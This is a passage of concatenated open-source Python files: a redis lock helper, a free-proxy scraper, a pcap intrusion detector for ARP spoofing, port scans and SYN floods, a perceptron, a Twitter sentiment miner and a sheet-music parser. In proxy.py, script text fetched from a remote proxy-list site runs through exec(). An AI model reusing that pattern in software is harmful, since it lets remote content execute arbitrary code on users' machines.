if exc_val:
return False
return self
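# Hedged usage sketch (not part of the original module): assumes a reachable
# redis server matching DEFAULT_LOX_CONFIG; the lock ids are hypothetical.
#     lox = Lox('jobs')
#     lock = lox.acquire('nightly-report', expires_seconds=60)
#     try:
#         pass  # critical section
#     finally:
#         lox.release(lock.id)
#     # or, acquiring an anonymous lock as a context manager:
#     with Lox('jobs'):
#         pass  # critical section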
|
sternb0t/lox
|
lox/lox.py
|
Python
|
mit
| 3,823
|
from okapi.templatetags import headers
from okapi.templatetags.exports import curl, jira
from okapi.templatetags import misc
filters = {
'nl2br': misc.nl2br,
'status_code_class': misc.status_code_class,
'escape_payload': curl.escape_payload,
'headers_as_string': headers.headers_as_string,
'export_curl': curl.export_curl,
'export_jira': jira.export_plain,
}
|
Team-Zeus/okapi
|
okapi/templatetags/__init__.py
|
Python
|
mit
| 387
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
get proxy list from http://pachong.com
"""
from bs4 import BeautifulSoup
import requests
import re
import socket
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
if 'threading' in sys.modules:
del sys.modules['threading']
import gevent
import gevent.monkey
from gevent.pool import Pool
gevent.monkey.patch_all()
IP = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,6})?')
def get_real_ip(proxy):
#url = 'http://www.ip.cn/'
#resp = requests.get(url, proxies=proxy, timeout=7, headers={'user-agent': 'curl/7.37.0',})
url = 'http://www.baidu.com/s?wd=ip'
#url = 'http://20140507.ip138.com/ic.asp'
resp = requests.get(url, proxies=proxy, timeout=7, headers={'user-agent': 'chrome',})
#print resp
if resp.status_code != 200:
raise Exception
real_ip = IP.findall(resp.content[resp.content.find('我的ip地址'):])[0]
#real_ip = IP.findall(resp.content)[0]
if proxy:
#print real_ip, proxy['http']
pass
return real_ip
local_ip = get_real_ip({})
def check(proxy):
try:
st = time.time()
real_ip = get_real_ip(proxy)
        if real_ip not in proxy['http']:
if real_ip == local_ip:
raise Exception
if real_ip:
#print r, proxy, "\t%dms" % int((time.time() - st)*1000)
proxy['speed'] = int((time.time() - st)*1000)
#print proxy['http']
return proxy
    except (requests.exceptions.Timeout, socket.timeout, requests.exceptions.ProxyError):
#print 'timeout'
return None
except Exception as e:
#print str(e)
#print 'Can not connect'
return None
def get_proxy_list_from_gevent(tasks):
proxy_list = []
jobs = []
p = Pool(1000)
for task in tasks:
jobs.append(p.spawn(check, task))
for job in jobs:
proxy = job.get()
if proxy:
proxy_list.append(proxy)
return proxy_list
def get_proxy_list_pachong():
url = 'http://pachong.org/anonymous.html'
res = requests.get(url, timeout=7)
text = res.content
soup = BeautifulSoup(text)
table = [
[cell.text for cell in row('td')] for row in soup('tr')
]
for js in soup('script'):
if 'var' in js.text:
exec ( js.getText().replace('var', '').strip() )
pattern = re.compile(r'write\((.*)\)')
for t in table[1:51]:
t[2] = re.findall(pattern, t[2])[0]
exec('port=%s' % t[2])
t[2] = str(port)
ret = table
jobs = []
for row in ret[1:51]:
if '空闲' in row[5].encode('utf-8'):
proxy = {'http': 'http://%s:%s' % (row[1], row[2])}
proxy['https'] = proxy['http']
jobs.append(proxy)
return jobs
def get_proxy_list_cnproxy():
#soup('table')[0]('tr')[2]('td')
url = 'http://cn-proxy.com/'
resp = requests.get(url, timeout=7)
soup = BeautifulSoup(resp.content)
jobs = []
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 2:
proxy = {
'http': 'http://%s:%s' % (tds[0].getText(), tds[1].getText()),
'https': 'http://%s:%s' % (tds[0].getText(), tds[1].getText()),
}
jobs.append(proxy)
return jobs
def get_proxy_list_ipcn():
url = 'http://proxy.ipcn.org/proxylist.html'
resp = requests.get(url, headers={'user-agent': 'chrome'}, timeout=7)
jobs = []
for ip in IP.findall(resp.content):
proxy = {
'http': 'http://%s' % ip,
'https': 'http://%s' % ip,
}
jobs.append(proxy)
return jobs
def get_proxy_list_proxy_ru_gaoni():
url = 'http://proxy.com.ru/gaoni/list_%d.html'
jobs = []
for i in xrange(1, 7):
try:
resp = requests.get(url%i, timeout=7)
except:
continue
if resp.status_code != 200:
continue
soup = BeautifulSoup(resp.content)
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 3:
proxy = {
'http': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
'https': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
}
jobs.append(proxy)
return jobs
def get_proxy_list_proxy_ru_niming():
url = 'http://proxy.com.ru/niming/list_%d.html'
jobs = []
for i in xrange(1, 7):
try:
resp = requests.get(url%i, timeout=7)
except:
continue
if resp.status_code != 200:
continue
soup = BeautifulSoup(resp.content)
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 3:
proxy = {
'http': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
'https': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
}
jobs.append(proxy)
return jobs
def get_proxy_list_itmop():
ip_list = []
jobs = []
for url in xrange(1690, 10000):
try:
url = 'http://www.itmop.com/proxy/post/%s.html' % url
# url = 'http://www.cz88.net/proxy/index_%s.aspx' % url
result = requests.get(url, timeout=10).text
pattern = re.compile(r'(\d+\.\d+\.\d+\.\d+)[: ](\d+)')
ilist = pattern.findall(result)
for ip in ilist:
proxy = {
'http': 'http://%s:%s' % (ip[0], ip[1]),
'https': 'http://%s:%s' % (ip[0], ip[1]),
}
jobs.append(proxy)
except:
raise
break
return jobs
def get_proxy_list():
print 'fetching proxy list from free proxy list site...'
ret = []
jobs = []
    proxy_source_methods = [
get_proxy_list_pachong,
get_proxy_list_cnproxy,
get_proxy_list_ipcn,
get_proxy_list_proxy_ru_gaoni,
get_proxy_list_proxy_ru_niming,
#get_proxy_list_itmop,
]
    for f in proxy_source_methods:
try:
jobs.append(gevent.spawn(f))
except requests.exceptions.Timeout:
pass
except:
pass
#ret.extend(get_proxy_list_pachong())
#ret.extend(get_proxy_list_cnproxy())
for job in jobs:
ret.extend(job.get())
ret = get_proxy_list_from_gevent(ret)
print 'proxy list fetch finished.'
return ret
def test():
st = time.time()
proxy_list = get_proxy_list()
print time.time() - st
#print proxy_list
print len(proxy_list)
if __name__ == '__main__':
test()
|
atupal/ccrawler
|
request/proxy.py
|
Python
|
mit
| 6,854
|
from coyote_framework.config.abstract_config import ConfigBase
class TimeoutConfig(ConfigBase):
def __init__(self):
super(TimeoutConfig, self).__init__('timeout')
|
Shapeways/coyote_framework
|
coyote_framework/config/timeout_config.py
|
Python
|
mit
| 177
|
import importlib
def get_full_class_path_name(obj):
if hasattr(obj,'__call__'):
obj = obj()
return obj.__module__ + "." + obj.__class__.__name__
def get_orient_valid_class_name(obj):
name = get_full_class_path_name(obj)
return name.replace(".", "___dot___")
def get_module_class_name_from_orient_class_name(orient_class):
pythonized = orient_class.replace("___dot___", ".")
parts = pythonized.split(".")
class_name = parts.pop()
module_name = '.'.join(parts)
return module_name, class_name
def class_for_name(module_name, class_name):
# load the module, will raise ImportError if module cannot be loaded
module = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
klass = getattr(module, class_name)
return klass
def get_class_from_orient_class_name(orient_class):
# wraps up other functions into one
module_name, class_name = get_module_class_name_from_orient_class_name(
orient_class)
return class_for_name(module_name, class_name)
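# Hedged usage note (not part of the original module): the two name forms are
# meant to round-trip; for a hypothetical models.thing.Thing instance t:
#     get_orient_valid_class_name(t)   # -> 'models___dot___thing___dot___Thing'
#     get_class_from_orient_class_name('models___dot___thing___dot___Thing')
#     # -> <class 'models.thing.Thing'>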
|
ejesse/ogorm
|
models/model_utils.py
|
Python
|
mit
| 1,141
|
from django.shortcuts import render
from django.views import View
class LoadTimes(View):
def get(self, request):
from apps.statistics.models import MStatistics
data = {
'feed_loadtimes_1min': MStatistics.get('last_1_min_time_taken'),
'feed_loadtimes_avg_hour': MStatistics.get('latest_avg_time_taken'),
'feeds_loaded_hour': MStatistics.get('latest_sites_loaded'),
}
chart_name = "load_times"
chart_type = "counter"
formatted_data = {}
for k, v in data.items():
formatted_data[k] = f'{chart_name}{{category="{k}"}} {v}'
context = {
"data": formatted_data,
"chart_name": chart_name,
"chart_type": chart_type,
}
return render(request, 'monitor/prometheus_data.html', context, content_type="text/plain")
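# Hedged output note (not part of the original module): each formatted_data
# entry is a Prometheus-style sample line, e.g. (value hypothetical)
#     load_times{category="feed_loadtimes_1min"} 0.42
# which the monitor/prometheus_data.html template presumably emits verbatim.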
|
samuelclay/NewsBlur
|
apps/monitor/views/newsblur_loadtimes.py
|
Python
|
mit
| 882
|
#!/usr/bin/env python
import math, optparse, random, sys, time, socket, struct
from collections import deque
import dpkt
# For debugging
import pdb
class IDS(object):
MAC_ADDRESSES = {
'\xC0\xA8\x00\x64': '\x7C\xD1\xC3\x94\x9E\xB8', # 192.168.0.100
'\xC0\xA8\x00\x67': '\xD8\x96\x95\x01\xA5\xC9', # 192.168.0.103
'\xC0\xA8\x00\x01': '\xF8\x1A\x67\xCD\x57\x6E', # 192.168.0.1
}
    def __init__(self):
        usage = '%prog <pcap>'
        self.op = optparse.OptionParser(usage=usage)
        # Per-instance detection state, so separate IDS instances do not
        # share port-scan or SYN-flood bookkeeping
        self.port_scan = {}
        self.syn_flood = {}
def _format_hw(self, addr):
return ':'.join(x.encode('hex') for x in addr)
def _format_ip(self, addr):
return socket.inet_ntoa(addr)
def _format_nums(self, pkts):
return '[%s]' % ','.join(str(pkt['num']) for pkt in pkts)
def test_arp_spoof(self, arp, num):
if arp.spa in self.MAC_ADDRESSES and arp.sha != self.MAC_ADDRESSES[arp.spa]:
print 'Warning: Arp spoofing detected with invalid address %s for packet number %d' % (self._format_hw(arp.sha), num)
def test_port_scan_tcp(self, tcp, ip, num):
if tcp.flags == dpkt.tcp.TH_SYN:
self.test_port_scan(tcp.dport, ip, num)
def test_port_scan_udp(self, udp, ip, num):
self.test_port_scan(udp.dport, ip, num)
def test_port_scan(self, port, ip, num):
if ip.dst in self.port_scan:
pkts = self.port_scan[ip.dst]
for pkt in pkts:
if port == pkt['port']:
return
pkts.append({'src': ip.src, 'dst': ip.dst, 'num': num, 'port': port})
else:
self.port_scan[ip.dst] = [{'src': ip.src, 'dst': ip.dst, 'num': num, 'port': port}]
def finish_test_port_scan(self):
for dst in self.port_scan:
pkts = self.port_scan[dst]
if len(pkts) > 100:
print 'Warning: Port scan detected from source address %s and victim address %s for packet numbers %s' % (self._format_ip(pkts[0]['src']), self._format_ip(pkts[0]['dst']), self._format_nums(pkts))
def test_syn_flood(self, tcp, ip, ts, num):
if tcp.flags == dpkt.tcp.TH_SYN:
dst = ip.dst+':'+str(tcp.dport)
if dst in self.syn_flood:
pkts = self.syn_flood[dst]
while len(pkts) > 0:
pkt = pkts[0]
if ts - pkt['ts'] >= 1:
pkts.popleft()
else:
break
pkts.append({'src': ip.src, 'dst': ip.dst, 'num': num, 'port': tcp.dport, 'ts': ts})
if len(pkts) > 100:
print 'Warning: Syn flood detected from source address %s and victim address %s for packet numbers %s' % (self._format_ip(pkts[0]['src']), self._format_ip(pkts[0]['dst']), self._format_nums(pkts))
pkts.clear()
else:
self.syn_flood[dst] = deque([{'src': ip.src, 'dst': ip.dst, 'num': num, 'port': tcp.dport, 'ts': ts}])
def main(self, argv=None):
if not argv:
argv = sys.argv[1:]
opts, args = self.op.parse_args(argv)
if not args:
self.op.error('missing pcap file')
elif len(args) > 1:
self.op.error('only one pcap file may be specified')
        f = open(args[0], 'rb')  # pcap files are binary
pcap = dpkt.pcap.Reader(f)
for idx, (ts, buf) in enumerate(pcap):
num = idx + 1
eth = dpkt.ethernet.Ethernet(buf)
level3 = eth.data
if type(level3) is dpkt.arp.ARP:
self.test_arp_spoof(level3, num)
elif type(level3) is dpkt.ip.IP:
level4 = level3.data
if type(level4) is dpkt.tcp.TCP:
self.test_port_scan_tcp(level4, level3, num)
self.test_syn_flood(level4, level3, ts, num)
elif type(level4) is dpkt.udp.UDP:
self.test_port_scan_udp(level4, level3, num)
self.finish_test_port_scan()
f.close()
if __name__ == '__main__':
p = IDS()
p.main()
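# Hedged usage note (not part of the original script): run it against a
# capture file, e.g.
#     python main.py capture.pcap
# ARP-spoofing, port-scan and SYN-flood warnings are printed to stdout.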
|
somethingnew2-0/CS642-HW2
|
main.py
|
Python
|
mit
| 4,175
|
import csv
import math
def get_samples(path='./ld2/examples.txt'):
# read attributes
with open(path) as f:
# `\d\\t\d\\n` format
example = [(int(a[0]), int(a[1]))
for a in csv.reader(f, delimiter='\t')]
return example
def get_results(path='./ld2/d.txt'):
with open(path) as f:
results = [int(a[0])
for a in csv.reader(f, delimiter='\t')]
return results
class Perceptron():
"""
    n  - number of neurons
    m  - number of weights per neuron, which is also the number of inputs
    x(m) - one training sample, a sequence of numbers
    W(n,m) - weight matrix
    b(n) - additional (bias) weights
    g  - slope coefficient of the activation function
    y(n) - computed output, a sequence of numbers
    e(n) - sample error
    nn - learning rate
"""
def __init__(self, n, m, W, b, g, nn):
self.n = n
self.m = m
self.w = W
self.b = b
self.g = g
self.nn = nn
self.grad = [0] * n
self.y = []
def run_slp_single(self, x):
y = []
for i in range(self.n):
net = self.b[i]
for k in range(self.m):
net += x[k] * self.w[i][k]
            # sigmoid (logistic) activation function
            y.append(1 / (1 + math.exp(-net / self.g)))
# y.append(1 if net > 0.5 else 0)
return y
def run_mlp_single(self, x):
for i in range(self.n):
net = self.b[i]
for k in range(self.m):
net += x[k] * self.w[i][k]
            # sigmoid (logistic) activation function
            self.y.append(1 / (1 + math.exp(-net / self.g)))
# y.append(1 if net > 0.5 else 0)
return self.y
def train_slp_single(self, x, d):
e = []
y = self.run_slp_single(x)
for i in range(self.n):
e.append(d - y[i])
self.grad[i] = e[i] / self.g * y[i] * (1 - y[i])
for k in range(self.m):
self.w[i][k] += self.nn * x[k] * self.grad[i]
self.b[i] += self.nn * self.grad[i]
return e
def train_slp(self, x, d, maxepoch=500):
p = len(x)
ee = 0.01
err = 100000
epoch = 0
while epoch < maxepoch and err > ee:
epoch += 1
err = 0
for k in range(p):
e = self.train_slp_single(x[k], d[k])
for j in range(self.n):
err += math.pow(e[j], 2)
err /= p * self.n
return self.w, self.b, epoch
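    # Hedged math note (not part of the original file): train_slp_single
    # implements the delta rule for a sigmoid unit. With
    #     y = 1 / (1 + exp(-net / g))
    # the local gradient is grad = (d - y) / g * y * (1 - y), and each weight
    # moves by nn * x[k] * grad (the bias by nn * grad).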
def main():
samples = get_samples()
results = get_results()
print(samples)
print(results)
    perceptron = Perceptron(
        n=1,
        m=2,
        W=[[-0.3, -0.3], [-0.3, -0.3]],
        b=[1],
        g=0.2,
        nn=0.1
    )
    print(
        [perceptron.run_slp_single(samples[i]) for i in range(4)]
    )
    print(
        [perceptron.train_slp_single(samples[i], results[i]) for i in range(4)]
    )
    print(perceptron.train_slp(samples, results))
if __name__ == "__main__":
main()
|
ktaube/neural-network-course
|
neural-netoworks/ld2.py
|
Python
|
mit
| 3,074
|
from random import random, seed
from ast import literal_eval
from movement import bot_map, direction
crash_flag = 0
seed()
values = {'weight': random(), 'threshold': 0, 'alpha': 15}
def init(): # first time write to file
global values
dump = open('dump.txt', 'w')
dump.write(str(values))
dump.close()
def learn(distance):
global direction, values
print values
# dump = open('dump.txt', 'r')
# # read file
# values = literal_eval(dump.read())
# dump.close()
weight = values['weight']
threshold = values['threshold']
product = distance * weight
if product < threshold:
print "Crash predicted. Commencing pre-emptive rerouting."
direction = (0, 0)
bot_map(direction)
return 1
else:
return 0
|
braininahat/sonny
|
perceptron.py
|
Python
|
mit
| 796
|
import os
__all__ = [
'is_updated',
]
def is_updated(old_file, new_file):
return not os.path.exists(new_file) or \
os.stat(old_file).st_mtime > os.stat(new_file).st_mtime
|
axiak/jinja-static
|
jinjastatic/utils.py
|
Python
|
mit
| 189
|
from setuptools import setup, find_packages
import os
CLASSIFIERS = [
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
]
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Dynamically calculate the version based on django_ajax.VERSION.
version = __import__('django_ajax').get_version()
setup(
author='Yonel Ceruto Glez',
author_email='yonelceruto@gmail.com',
name='djangoajax',
version=version,
description='Powerful and easy AJAX framework for django applications.',
long_description=README,
url='https://github.com/yceruto/django-ajax',
license='MIT License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'setuptools',
'django>=1.3',
],
packages=find_packages(),
include_package_data=True,
zip_safe=False
)
|
furious-luke/django-ajax
|
setup.py
|
Python
|
mit
| 1,325
|
import models
import urllib
import urllib2
import simplejson as json
import re
from porterstemmer import Stemmer
from datetime import datetime
from itertools import count
stemmer = Stemmer()
PLUS_LIST = [
'cool',
'awesome',
'like',
'good',
'love',
'great',
'enjoy',
'amazing',
]
MINUS_LIST = [
'dislike',
'hate',
'sucks',
'not like',
'don\'t like',
'bad'
]
CHECK_WORD = re.compile(r'^([\w\d\-_]+?)[\.\?\!,\-]?( |$)')
PLUS_LIST = map(stemmer, PLUS_LIST)
MINUS_LIST = map(stemmer, MINUS_LIST)
plus_expr = '(%s)' % '|'.join(PLUS_LIST)
minus_expr = '(%s)' % '|'.join(MINUS_LIST)
PLUS_EXPR = re.compile(plus_expr)
MINUS_EXPR = re.compile(minus_expr)
class TwitterFetcher(object):
def __init__(self, query_string, since_id=1, fetch_lib=urllib2):
self.query_string = query_string
self.since_id = since_id
self.fetch_lib = fetch_lib
def fetch(self):
        params = urllib.urlencode({
            u'q': self.query_string.encode('utf-8'),
            u'since_id': self.since_id
        })
        result = self.fetch_lib.urlopen(
            u'http://search.twitter.com/search.json?%s' % params
        ).read()
return json.loads(result)
class TwitterUserFetcher(object):
def __init__(self, user, since_id=1, fetch_lib=urllib2):
self.user = user
self.since_id = since_id
self.fetch_lib = fetch_lib
def fetch(self):
        params = urllib.urlencode({
            'screen_name': self.user,
            'since_id': self.since_id,
            'count': 1000
        })
        url = 'http://twitter.com/statuses/user_timeline.json?%s' % params
result = self.fetch_lib.urlopen(url).read()
return json.loads(result)
def find_or_create_user(name):
return models.User.objects.get_or_create(
name=name,
network='twitter',
url="http://twitter.com/%s" % name
)[0]
def get_score(msg):
if MINUS_EXPR.search(msg):
return -1
if PLUS_EXPR.search(msg):
return 1
#if any(map(lambda a: a in msg, MINUS_LIST)):
# return -1
#if any(map(lambda a: a in msg, PLUS_LIST)):
# return 1
#for minus in MINUS_LIST:
# if minus in msg:
# return -1
#for plus in PLUS_LIST:
# if plus in msg:
# return 1
return 0
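# Editor's sketch (hypothetical inputs, not from the original repo): the two
# alternation regexes above run on stemmed text, so for example
#   get_score(stemmer('i love this movie'))    # -> 1  (matches PLUS_EXPR)
#   get_score(stemmer('this movie sucks'))     # -> -1 (matches MINUS_EXPR)
#   get_score(stemmer('saw the movie today'))  # -> 0  (matches neither)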
def update_trackable(trackable, id, score):
trackable.last_id = id if id > trackable.last_id else trackable.last_id
trackable.score += score
trackable.save()
def create_data(trackable, results):
stemmer = Stemmer()
name = stemmer(trackable.name)
for result in results:
txt = stemmer(result['text'])
if not contains_movie(txt, name):
continue
user = find_or_create_user(result['from_user'])
score = get_score(stemmer(result['text'].lower()))
user.review(trackable, score)
update_trackable(trackable, result['id'], score)
def fetch_trackable(trackable, fetch_class=TwitterFetcher):
f = fetch_class(trackable.name, since_id=trackable.last_id)
return f.fetch()
def fetch_data(fetch_class=TwitterFetcher):
for t in models.Trackable.objects.all():
result = fetch_trackable(t, fetch_class=fetch_class)
create_data(t, result['results'])
def fetch_user(user, fetch_class=TwitterUserFetcher):
f = fetch_class(user.name, since_id=user.last_id)
try:
return f.fetch()
except Exception, e:
print e
return []
def contains_movie(text, movie_name):
names_list = movie_name.split(' ')
for name in names_list:
if name not in text: return False
positions = map(text.find, names_list)
sub_strings = map(lambda i: text[i:], positions)
if any(map(
lambda i: i != 0 and
re.match(r'[\w]', text[i - 1]) is not None, positions
)): return False
# more sophisticated tests
contains_full_words = map(lambda a: CHECK_WORD.match(a), sub_strings)
if any(map(lambda i: i is None, contains_full_words)): return False
sub_matches = map(lambda a: a.groups()[0], contains_full_words)
if any(map(lambda a: a not in names_list, sub_matches)): return False
return True
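# Editor's worked example (not in the original): with the stemmed name
# 'toy stori', contains_movie('i like toy stori', 'toy stori') is True: both
# words occur, neither is preceded by a word character, and both CHECK_WORD
# matches ('toy', 'stori') are in the name list. By contrast,
# contains_movie('historic toys', 'toy stori') is False: 'stori' is found
# inside 'historic', where the preceding-character check fails.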
def find_trackable(trackables, text):
stemmer = Stemmer()
for trackable in trackables:
if contains_movie(text, stemmer(trackable.name)):
return trackable
return None
def create_user_data(user, trackables, results):
stemmer = Stemmer()
for result in results:
msg = stemmer(result['text'])
trackable = find_trackable(trackables, msg)
score = get_score(msg)
if result['id'] > user.last_id: user.last_id = result['id']
if not trackable: continue
update_trackable(trackable, 0, score)
user.review(trackable, score)
user.save()
def fetch_user_data(fetch_class=TwitterFetcher):
trackables = models.Trackable.objects.all()
for user in models.User.objects.all():
results = fetch_user(user, fetch_class=fetch_class)
create_user_data(user, trackables, results)
|
mop/twit-miner
|
twit_miner/crits/twitlib.py
|
Python
|
mit
| 5,119
|
from api.parsers.constants.en import GENDER, CASES, NUMBER, MOOD, TENSE, PERSONS, VOICE, DEFINITENESS, POSSESSIVENESS
def render_non_lemma(non_lemma_type):
def wrapper(non_lemma) -> str:
explanation = non_lemma_type
ret = explanation + ' of [[%s]]' % (non_lemma.lemma)
return ret
return wrapper
render_romanization = render_non_lemma('romanization')
render_alternative_spelling = render_non_lemma('alternative spelling')
def render_noun_form(non_lemma) -> str:
"""
    :return: An English-language definition in unicode
"""
explanation = ''
if non_lemma.possessive in POSSESSIVENESS:
explanation += POSSESSIVENESS[non_lemma.possessive] + ' '
if non_lemma.case in CASES:
explanation += CASES[non_lemma.case] + ' '
if non_lemma.gender in GENDER:
explanation += GENDER[non_lemma.gender] + ' '
if non_lemma.number in NUMBER:
explanation += NUMBER[non_lemma.number] + ' '
if non_lemma.definite in DEFINITENESS:
explanation += DEFINITENESS[non_lemma.definite] + ' '
ret = explanation + 'of [[%s]]' % (non_lemma.lemma)
return ret
def render_verb_form(non_lemma) -> str:
"""
    :return: An English-language definition in unicode
"""
explanation = ''
if non_lemma.person in PERSONS:
explanation += PERSONS[non_lemma.person] + ' '
if non_lemma.number in NUMBER:
explanation += NUMBER[non_lemma.number] + ' '
explanation += 'of the ' if len(explanation.strip()) != 0 else ''
if non_lemma.mood in MOOD:
explanation += MOOD[non_lemma.mood] + ' '
if non_lemma.tense in TENSE:
explanation += TENSE[non_lemma.tense] + ' '
explanation += 'of the ' if len(explanation.strip()) != 0 else ''
if non_lemma.voice in VOICE:
explanation += VOICE[non_lemma.voice] + ' '
ret = explanation + 'of [[%s]]' % (non_lemma.lemma)
return ret
|
radomd92/botjagwar
|
api/parsers/renderers/en.py
|
Python
|
mit
| 1,923
|
from __future__ import division
import collections
from datetime import datetime
from time import mktime
DATE_SUFFIX = collections.OrderedDict([
(31557600, "year"),
(2592000, "month"),
(604800, "week"),
(86400, "day"),
(3600, "hour"),
(60, "minute"),
(0, "second")
])
def difference(tfrom, tto):
if type(tfrom) == datetime:
tfrom = mktime(tfrom.timetuple())
if type(tto) == datetime:
tto = mktime(tto.timetuple())
tfrom, tto = int(tfrom), int(tto)
distance = tto - tfrom
if distance == 0:
return "just now"
present = "from now" if distance > 0 else "ago"
distance = abs(distance)
for key, val in DATE_SUFFIX.items():
if key <= distance:
distance = int(distance / key) if key > 0 else distance
return "{} {}{} {}".format(distance, val, "" if distance == 1 else "s", present)
def preciseDifference(tfrom, tto):
if type(tfrom) == datetime:
tfrom = mktime(tfrom.timetuple())
if type(tto) == datetime:
tto = mktime(tto.timetuple())
tfrom, tto = int(tfrom), int(tto)
distance = tto - tfrom
if distance == 0:
return "just now"
present = "from now" if distance > 0 else "ago"
distance = abs(distance)
values = []
for key, val in DATE_SUFFIX.items():
if key <= distance:
value = int(distance / key) if key > 0 else distance
distance -= value * (key if key > 0 else 1)
values.append("{} {}{}".format(value, val, "" if value == 1 else "s"))
if distance <= 0:
break
return ", ".join(values) + " " + present
|
clugg/humanizepy
|
humanizepy/_datetime.py
|
Python
|
mit
| 1,676
|
"""urlconf for the base application"""
from django.conf.urls import url, patterns
from . import views
urlpatterns = patterns('base.views',
url(r'^$', 'home', name='home'),
url(r'^grow/monitor/$', 'monitor', name='monitor'),
url(r'^grow/about/$', 'about', name='about'),
url(r'^grow/control/$', 'control', name='control'),
)
|
jpk0727/growApp
|
apps/base/urls.py
|
Python
|
mit
| 344
|
from PIL import Image
import math
import numpy as np
class SheetImage:
def __init__(self, source_image_path):
# initializes image metadata from analyzing image
self.image = Image.open(source_image_path)
self.image_array = np.asarray(self.image)
# static methods used for image analysis on both the main image
# as well as its constituents
@staticmethod
def get_width(image):
# returns the width of the provided image
return SheetImage.get_dimensions(image)[0]
@staticmethod
def get_height(image):
        # returns the height of the provided image
return SheetImage.get_dimensions(image)[1]
@staticmethod
def get_midpoint(image):
# returns x-midpoint of the provided image
return int(math.ceil(SheetImage.get_width(image)/2))
@staticmethod
def get_dimensions(image):
# returns tuple of (width, height) of the provided image
image_array_shape = np.asarray(image).shape
return image_array_shape[1], image_array_shape[0]
@staticmethod
def pixel_is_black(image, x, y, threshold=20):
# returns true if the given pixel is "within threshold values" to black
pixel_value = SheetImage.get_pixel_value(image, x, y)
return pixel_value < threshold
@staticmethod
def get_pixel_value(image, x, y):
return np.asarray(image)[y][x]
@staticmethod
def get_row(image, row_number):
return np.asarray(image)[row_number]
    @staticmethod
    def get_column(image, column_number):
        column = []
        image_height = SheetImage.get_height(image)
        for y in range(image_height):
            column.append(np.asarray(image)[y][column_number])
        return column
def get_notes(self):
# returns a list of note images from sheet music image
print("Attempting to parse notes.")
staff_images = self.__get_staff_images()
notes = []
for staff in staff_images:
print("Analyzing a staff.")
width = SheetImage.get_width(staff)
height = SheetImage.get_height(staff)
# get the number of black pixels for a staff with no notes
# to get this, we'll scan the staff and take the least amount of black pixels found
least_found = None
for x in range(0, width):
number_found = 0
for y in range(0, height):
if SheetImage.pixel_is_black(staff, x, y):
number_found += 1
if number_found < least_found or least_found is None:
least_found = number_found
empty_staff_black_pixel_count = least_found
# now that we have the amount of black pixels expected in a column where there is no
# note, we can begin to slice out the actual notes
scanning_note = False
note_begin = None
note_end = None
for x in range(0, width):
number_found = 0
for y in range(0, height):
if SheetImage.pixel_is_black(staff, x, y):
number_found += 1
if empty_staff_black_pixel_count == number_found: # we're still looking for a note
if scanning_note:
# we found the end of the note
note_end = x-1
scanning_note = False
# as a rough way to check that it is, in fact, a note, check that it's width > 3px
if (note_end - note_begin > 3):
# add some image padding
note_begin -= 2
note_end += 2
note = staff.crop((note_begin, 0, note_end, height-1))
notes.append(note)
print("Found a note.")
else:
pass # we're probably looking at a divider
else:
# just keep looking
pass
else:
if scanning_note:
# we already know we're looking at a note, find the end
pass
else:
                        # found the beginning of a note
scanning_note = True
note_begin = x
return notes
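    # Editor's summary (illustration, not in the original): the scan above
    # takes the column with the fewest black pixels (the bare staff lines)
    # as the "empty" baseline; any run of columns with more black pixels is
    # a note candidate, kept only if wider than 3 px and cropped with 2 px
    # of padding on each side.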
def __get_staff_images(self):
# returns images of the staffs
staff_positions = self.__get_staffs_positions()
staff_images = []
for i, p in enumerate(staff_positions):
x1 = p[0]
y1 = p[1]
x2 = p[0]+p[2]
y2 = p[1]+p[3]
image = self.image.crop((x1, y1, x2, y2))
staff_images.append(image)
return staff_images
def __get_staffs_positions(self):
# returns 4-tuples of staff dimensions
# takes a staff_ys_list from get_staff_ys()
# get the first staff y-values
staff_ys_list = self.__get_all_staffs_ys()
first_staff = staff_ys_list[0]
first_staffs_ys = range(first_staff[0], first_staff[1])
staff_x_beginning = 0
staff_x_end = SheetImage.get_width(self.image)
# starting from the middle of the page, go left until black pixels aren't found
for x in reversed(range(0, SheetImage.get_midpoint(self.image))):
found_black = False
for y in first_staffs_ys:
current_pixel = SheetImage.pixel_is_black(self.image, x, y, 20)
found_black = found_black or current_pixel
if not found_black:
staff_x_beginning = x+3
break
# starting from the middle of the page, go right until black pixels aren't found
for x in range(SheetImage.get_midpoint(self.image), SheetImage.get_width(self.image)):
found_black = False
for y in first_staffs_ys:
current_pixel = SheetImage.pixel_is_black(self.image, x, y, 20)
found_black = found_black or current_pixel
if not found_black:
staff_x_end = x-2
break
staff_positions_without_padding = []
# compile list of x, y, width, height of staffs
for staff_ys in staff_ys_list:
x = staff_x_beginning
width = staff_x_end - staff_x_beginning
y = staff_ys[0]
height = staff_ys[1] - staff_ys[0]
dimensions = (x, y, width, height)
staff_positions_without_padding.append(dimensions)
# add paddings to support off-staff notes
final_staff_positions = []
# determine padding as half of distance between staff 1 and 2
for staff_position in staff_positions_without_padding:
height = staff_position[3]
padding = int(height / 2)
width = staff_position[2]
height += padding * 2
x = staff_position[0]
y = staff_position[1] - padding
final_staff_positions.append((x, y, width, height))
return final_staff_positions
def __get_all_staffs_ys(self):
# returns list of staff y positions tuples: [(beg, end)]
staffs_ys_list = []
found_staff = True
while (found_staff):
current_staff_ys = self.__get_first_staff_ys(staffs_ys_list[-1][1] if len(staffs_ys_list) > 0 else 0)
            if current_staff_ys is None:
found_staff = False
else:
staffs_ys_list.append(current_staff_ys)
